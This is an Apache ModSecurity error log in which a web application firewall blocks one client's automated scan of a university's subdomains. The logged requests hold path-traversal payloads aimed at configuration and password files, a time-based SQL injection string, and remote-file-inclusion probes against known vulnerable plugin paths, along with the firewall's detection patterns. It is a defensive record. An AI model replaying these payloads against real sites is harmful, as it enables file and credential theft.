[Tue Aug 29 11:43:09.377892 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://google.com found within TX:1: google.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/servlet/taskProc"] [unique_id "ZO13XcCo-f0AAActbOIAAAAH"]
[Tue Aug 29 11:43:09.392396 2023] [:error] [pid 1969] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/themes/NativeChurch/download/download.php"] [unique_id "ZO13XcCo-f0AAAexH-IAAAAN"]
[Tue Aug 29 11:43:09.395302 2023] [:error] [pid 1944] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/themes/NativeChurch/download/download.php"] [unique_id "ZO13XcCo-f0AAAeYb0wAAAAB"]
[Tue Aug 29 11:43:09.395581 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/themes/NativeChurch/download/download.php"] [unique_id "ZO13XcCo-f0AAAcoNnwAAAAF"]
[Tue Aug 29 11:43:09.410522 2023] [:error] [pid 1922] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/themes/NativeChurch/download/download.php"] [unique_id "ZO13XcCo-f0AAAeChbAAAAAw"]
[Tue Aug 29 11:43:09.416655 2023] [:error] [pid 1968] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/themes/NativeChurch/download/download.php"] [unique_id "ZO13XcCo-f0AAAewCUwAAAAI"]
[Tue Aug 29 11:43:10.387798 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:download_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:download_file: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO13XsCo-f0AAAcoNn0AAAAF"]
[Tue Aug 29 11:43:10.391016 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://google.com found within TX:1: google.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/MicroStrategy/servlet/taskProc"] [unique_id "ZO13XsCo-f0AAAcsLJYAAAAE"]
[Tue Aug 29 11:43:10.405273 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:download_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:download_file: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13XsCo-f0AAAQSW4kAAAA0"]
[Tue Aug 29 11:43:10.407899 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:download_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:download_file: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13XsCo-f0AAAdb7n8AAAAb"]
[Tue Aug 29 11:43:10.418635 2023] [:error] [pid 1968] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:download_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:download_file: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13XsCo-f0AAAewCU4AAAAI"]
[Tue Aug 29 11:43:10.493745 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:download_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:download_file: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13XsCo-f0AAAcsLJgAAAAE"]
[Tue Aug 29 11:43:11.408348 2023] [:error] [pid 1967] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:abspath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:abspath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php"] [unique_id "ZO13X8Co-f0AAAevkRsAAAAA"]
[Tue Aug 29 11:43:11.464213 2023] [:error] [pid 1968] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:abspath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:abspath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php"] [unique_id "ZO13X8Co-f0AAAewCVYAAAAI"]
[Tue Aug 29 11:43:11.484864 2023] [:error] [pid 1970] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:abspath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:abspath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php"] [unique_id "ZO13X8Co-f0AAAey2m0AAAAO"]
[Tue Aug 29 11:43:11.489699 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:download_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:download_file: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13X8Co-f0AAAQSW5MAAAA0"]
[Tue Aug 29 11:43:11.493026 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:abspath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:abspath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php"] [unique_id "ZO13X8Co-f0AAActbOwAAAAH"]
[Tue Aug 29 11:43:11.509414 2023] [:error] [pid 1874] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:abspath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:abspath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php"] [unique_id "ZO13X8Co-f0AAAdSZREAAAAX"]
[Tue Aug 29 11:43:12.425877 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:abspath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:abspath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php"] [unique_id "ZO13YMCo-f0AAAdQ3lQAAAAV"]
[Tue Aug 29 11:43:14.402901 2023] [:error] [pid 1967] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wpv-image. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:wpv-image: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO13YsCo-f0AAAevkSwAAAAA"]
[Tue Aug 29 11:43:14.456630 2023] [:error] [pid 1967] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wpv-image. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:wpv-image: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO13YsCo-f0AAAevkS4AAAAA"]
[Tue Aug 29 11:43:14.463594 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wpv-image. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:wpv-image: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO13YsCo-f0AAActbPUAAAAH"]
[Tue Aug 29 11:43:14.467324 2023] [:error] [pid 1875] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wpv-image. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:wpv-image: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO13YsCo-f0AAAdTBEsAAAAY"]
[Tue Aug 29 11:43:14.475212 2023] [:error] [pid 1968] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wpv-image. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:wpv-image: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO13YsCo-f0AAAewCWMAAAAI"]
[Tue Aug 29 11:43:15.547917 2023] [:error] [pid 1943] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/admin/"] [unique_id "ZO13Y8Co-f0AAAeX1GIAAAAK"]
[Tue Aug 29 11:43:15.635143 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/admin/"] [unique_id "ZO13Y8Co-f0AAAcsLKgAAAAE"]
[Tue Aug 29 11:43:15.653539 2023] [:error] [pid 1967] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/admin/"] [unique_id "ZO13Y8Co-f0AAAevkTQAAAAA"]
[Tue Aug 29 11:43:15.654859 2023] [:error] [pid 1922] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wpv-image. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:wpv-image: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO13Y8Co-f0AAAeChb0AAAAw"]
[Tue Aug 29 11:43:15.660381 2023] [:error] [pid 1768] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/admin/"] [unique_id "ZO13Y8Co-f0AAAbo-hMAAAAi"]
[Tue Aug 29 11:43:15.704283 2023] [:error] [pid 1860] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/admin/"] [unique_id "ZO13Y8Co-f0AAAdECesAAAAW"]
[Tue Aug 29 11:43:16.427871 2023] [:error] [pid 1970] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/admin/"] [unique_id "ZO13ZMCo-f0AAAey2ncAAAAO"]
[Tue Aug 29 11:43:18.397514 2023] [:error] [pid 1874] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:file: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/document.php"] [unique_id "ZO13ZsCo-f0AAAdSZSgAAAAX"]
[Tue Aug 29 11:43:18.401285 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:file: ../../../../../../../LocalConfiguration.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php"] [unique_id "ZO13ZsCo-f0AAAdQ3mcAAAAV"]
